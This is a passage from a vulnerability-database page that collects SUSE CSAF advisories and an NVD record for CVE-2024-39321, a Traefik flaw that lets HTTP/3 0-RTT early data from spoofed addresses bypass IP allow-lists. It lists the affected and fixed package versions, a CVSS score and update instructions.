      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14182-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2024-39321 page",
        "url": "https://www.suse.com/security/cve/CVE-2024-39321/"
      }
    ],
    "title": "traefik2-2.11.6-2.1 on GA media",
    "tracking": {
      "current_release_date": "2024-07-12T00:00:00Z",
      "generator": {
        "date": "2024-07-12T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2024:14182-1",
      "initial_release_date": "2024-07-12T00:00:00Z",
      "revision_history": [
        {
          "date": "2024-07-12T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik2-2.11.6-2.1.aarch64",
                "product": {
                  "name": "traefik2-2.11.6-2.1.aarch64",
                  "product_id": "traefik2-2.11.6-2.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik2-2.11.6-2.1.ppc64le",
                "product": {
                  "name": "traefik2-2.11.6-2.1.ppc64le",
                  "product_id": "traefik2-2.11.6-2.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik2-2.11.6-2.1.s390x",
                "product": {
                  "name": "traefik2-2.11.6-2.1.s390x",
                  "product_id": "traefik2-2.11.6-2.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik2-2.11.6-2.1.x86_64",
                "product": {
                  "name": "traefik2-2.11.6-2.1.x86_64",
                  "product_id": "traefik2-2.11.6-2.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik2-2.11.6-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik2-2.11.6-2.1.aarch64"
        },
        "product_reference": "traefik2-2.11.6-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik2-2.11.6-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik2-2.11.6-2.1.ppc64le"
        },
        "product_reference": "traefik2-2.11.6-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik2-2.11.6-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik2-2.11.6-2.1.s390x"
        },
        "product_reference": "traefik2-2.11.6-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik2-2.11.6-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik2-2.11.6-2.1.x86_64"
        },
        "product_reference": "traefik2-2.11.6-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-39321",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2024-39321"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Traefik is an HTTP reverse proxy and load balancer. Versions prior to 2.11.6, 3.0.4, and 3.1.0-rc3 have a vulnerability that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses. Versions 2.11.6, 3.0.4, and 3.1.0-rc3 contain a patch for this issue. No known workarounds are available.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:traefik2-2.11.6-2.1.aarch64",
          "openSUSE Tumbleweed:traefik2-2.11.6-2.1.ppc64le",
          "openSUSE Tumbleweed:traefik2-2.11.6-2.1.s390x",
          "openSUSE Tumbleweed:traefik2-2.11.6-2.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2024-39321",
          "url": "https://www.suse.com/security/cve/CVE-2024-39321"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1227515 for CVE-2024-39321",
          "url": "https://bugzilla.suse.com/1227515"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:traefik2-2.11.6-2.1.aarch64",
            "openSUSE Tumbleweed:traefik2-2.11.6-2.1.ppc64le",
            "openSUSE Tumbleweed:traefik2-2.11.6-2.1.s390x",
            "openSUSE Tumbleweed:traefik2-2.11.6-2.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2024-07-12T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2024-39321"
    }
  ]
}

opensuse-su-2024:14181-1

Vulnerability from csaf_opensuse

Published

2024-07-12 00:00

Modified

2024-07-12 00:00

Summary

traefik-3.0.4-2.1 on GA media

Notes

Title of the patch

traefik-3.0.4-2.1 on GA media

Description of the patch

These are all security issues fixed in the traefik-3.0.4-2.1 package on the GA media of openSUSE Tumbleweed.

Patchnames

openSUSE-Tumbleweed-2024-14181

CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://www.suse.com/support/security/rating/",
      "text": "moderate"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright 2024 SUSE LLC. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "traefik-3.0.4-2.1 on GA media",
        "title": "Title of the patch"
      },
      {
        "category": "description",
        "text": "These are all security issues fixed in the traefik-3.0.4-2.1 package on the GA media of openSUSE Tumbleweed.",
        "title": "Description of the patch"
      },
      {
        "category": "details",
        "text": "openSUSE-Tumbleweed-2024-14181",
        "title": "Patchnames"
      },
      {
        "category": "legal_disclaimer",
        "text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
        "title": "Terms of use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://www.suse.com/support/security/contact/",
      "name": "SUSE Product Security Team",
      "namespace": "https://www.suse.com/"
    },
    "references": [
      {
        "category": "external",
        "summary": "SUSE ratings",
        "url": "https://www.suse.com/support/security/rating/"
      },
      {
        "category": "self",
        "summary": "URL of this CSAF notice",
        "url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14181-1.json"
      },
      {
        "category": "self",
        "summary": "SUSE CVE CVE-2024-39321 page",
        "url": "https://www.suse.com/security/cve/CVE-2024-39321/"
      }
    ],
    "title": "traefik-3.0.4-2.1 on GA media",
    "tracking": {
      "current_release_date": "2024-07-12T00:00:00Z",
      "generator": {
        "date": "2024-07-12T00:00:00Z",
        "engine": {
          "name": "cve-database.git:bin/generate-csaf.pl",
          "version": "1"
        }
      },
      "id": "openSUSE-SU-2024:14181-1",
      "initial_release_date": "2024-07-12T00:00:00Z",
      "revision_history": [
        {
          "date": "2024-07-12T00:00:00Z",
          "number": "1",
          "summary": "Current version"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.0.4-2.1.aarch64",
                "product": {
                  "name": "traefik-3.0.4-2.1.aarch64",
                  "product_id": "traefik-3.0.4-2.1.aarch64"
                }
              }
            ],
            "category": "architecture",
            "name": "aarch64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.0.4-2.1.ppc64le",
                "product": {
                  "name": "traefik-3.0.4-2.1.ppc64le",
                  "product_id": "traefik-3.0.4-2.1.ppc64le"
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.0.4-2.1.s390x",
                "product": {
                  "name": "traefik-3.0.4-2.1.s390x",
                  "product_id": "traefik-3.0.4-2.1.s390x"
                }
              }
            ],
            "category": "architecture",
            "name": "s390x"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "traefik-3.0.4-2.1.x86_64",
                "product": {
                  "name": "traefik-3.0.4-2.1.x86_64",
                  "product_id": "traefik-3.0.4-2.1.x86_64"
                }
              }
            ],
            "category": "architecture",
            "name": "x86_64"
          },
          {
            "branches": [
              {
                "category": "product_name",
                "name": "openSUSE Tumbleweed",
                "product": {
                  "name": "openSUSE Tumbleweed",
                  "product_id": "openSUSE Tumbleweed",
                  "product_identification_helper": {
                    "cpe": "cpe:/o:opensuse:tumbleweed"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "SUSE Linux Enterprise"
          }
        ],
        "category": "vendor",
        "name": "SUSE"
      }
    ],
    "relationships": [
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.0.4-2.1.aarch64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.0.4-2.1.aarch64"
        },
        "product_reference": "traefik-3.0.4-2.1.aarch64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.0.4-2.1.ppc64le as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.0.4-2.1.ppc64le"
        },
        "product_reference": "traefik-3.0.4-2.1.ppc64le",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.0.4-2.1.s390x as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.0.4-2.1.s390x"
        },
        "product_reference": "traefik-3.0.4-2.1.s390x",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      },
      {
        "category": "default_component_of",
        "full_product_name": {
          "name": "traefik-3.0.4-2.1.x86_64 as component of openSUSE Tumbleweed",
          "product_id": "openSUSE Tumbleweed:traefik-3.0.4-2.1.x86_64"
        },
        "product_reference": "traefik-3.0.4-2.1.x86_64",
        "relates_to_product_reference": "openSUSE Tumbleweed"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-39321",
      "ids": [
        {
          "system_name": "SUSE CVE Page",
          "text": "https://www.suse.com/security/cve/CVE-2024-39321"
        }
      ],
      "notes": [
        {
          "category": "general",
          "text": "Traefik is an HTTP reverse proxy and load balancer. Versions prior to 2.11.6, 3.0.4, and 3.1.0-rc3 have a vulnerability that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses. Versions 2.11.6, 3.0.4, and 3.1.0-rc3 contain a patch for this issue. No known workarounds are available.",
          "title": "CVE description"
        }
      ],
      "product_status": {
        "recommended": [
          "openSUSE Tumbleweed:traefik-3.0.4-2.1.aarch64",
          "openSUSE Tumbleweed:traefik-3.0.4-2.1.ppc64le",
          "openSUSE Tumbleweed:traefik-3.0.4-2.1.s390x",
          "openSUSE Tumbleweed:traefik-3.0.4-2.1.x86_64"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "CVE-2024-39321",
          "url": "https://www.suse.com/security/cve/CVE-2024-39321"
        },
        {
          "category": "external",
          "summary": "SUSE Bug 1227515 for CVE-2024-39321",
          "url": "https://bugzilla.suse.com/1227515"
        }
      ],
      "remediations": [
        {
          "category": "vendor_fix",
          "details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
          "product_ids": [
            "openSUSE Tumbleweed:traefik-3.0.4-2.1.aarch64",
            "openSUSE Tumbleweed:traefik-3.0.4-2.1.ppc64le",
            "openSUSE Tumbleweed:traefik-3.0.4-2.1.s390x",
            "openSUSE Tumbleweed:traefik-3.0.4-2.1.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "date": "2024-07-12T00:00:00Z",
          "details": "important"
        }
      ],
      "title": "CVE-2024-39321"
    }
  ]
}

fkie_cve-2024-39321

Vulnerability from fkie_nvd

Published

2024-07-05 18:15

Modified

2024-11-21 09:27

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Summary

References

▶	URL	Tags
	security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v2.11.6
	security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v3.0.4
	security-advisories@github.com	https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3
	security-advisories@github.com	https://github.com/traefik/traefik/security/advisories/GHSA-gxrv-wf35-62w9
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/traefik/traefik/releases/tag/v2.11.6
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/traefik/traefik/releases/tag/v3.0.4
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/traefik/traefik/security/advisories/GHSA-gxrv-wf35-62w9

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Traefik is an HTTP reverse proxy and load balancer. Versions prior to 2.11.6, 3.0.4, and 3.1.0-rc3 have a vulnerability that allows bypassing IP allow-lists via HTTP/3 early data requests in QUIC 0-RTT handshakes sent with spoofed IP addresses. Versions 2.11.6, 3.0.4, and 3.1.0-rc3 contain a patch for this issue. No known workarounds are available."
    },
    {
      "lang": "es",
      "value": "Traefik es un proxy inverso HTTP y un equilibrador de carga. Las versiones anteriores a 2.11.6, 3.0.4 y 3.1.0-rc3 tienen una vulnerabilidad que permite eludir las listas de direcciones IP permitidas a trav\u00e9s de solicitudes de datos tempranas HTTP/3 en protocolos de enlace QUIC 0-RTT enviados con direcciones IP falsificadas. Las versiones 2.11.6, 3.0.4 y 3.1.0-rc3 contienen un parche para este problema. No hay soluciones conocidas disponibles."
    }
  ],
  "id": "CVE-2024-39321",
  "lastModified": "2024-11-21T09:27:27.390",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-07-05T18:15:32.430",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.6"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.0.4"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-gxrv-wf35-62w9"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/traefik/traefik/releases/tag/v2.11.6"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.0.4"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/traefik/traefik/releases/tag/v3.1.0-rc3"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://github.com/traefik/traefik/security/advisories/GHSA-gxrv-wf35-62w9"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-639"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2024-39321 (GCVE-0-2024-39321)

Vulnerability from cvelistv5

ghsa-gxrv-wf35-62w9

Vulnerability from github

Impact

Patches

Workarounds

For more information

opensuse-su-2024:14182-1

Vulnerability from csaf_opensuse

opensuse-su-2024:14181-1

Vulnerability from csaf_opensuse

fkie_cve-2024-39321

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature